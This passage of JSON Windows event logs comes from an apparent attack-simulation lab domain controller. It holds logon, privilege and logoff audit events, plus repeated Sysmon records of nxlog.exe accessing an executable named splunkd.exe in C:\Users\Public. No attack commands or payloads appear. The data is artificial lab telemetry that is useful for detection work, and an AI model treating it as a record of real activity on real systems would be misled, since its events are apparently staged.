(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220661,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90E8E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x90e8e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:55:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220662,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x90E8E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52673\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x90e8e","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52673","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220663,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x90E8E\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x90e8e","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:29.528\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:29.528","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:30.528\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:30.528","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:31.528\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:31.528","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:32.528\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:32.528","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:33.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:33.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 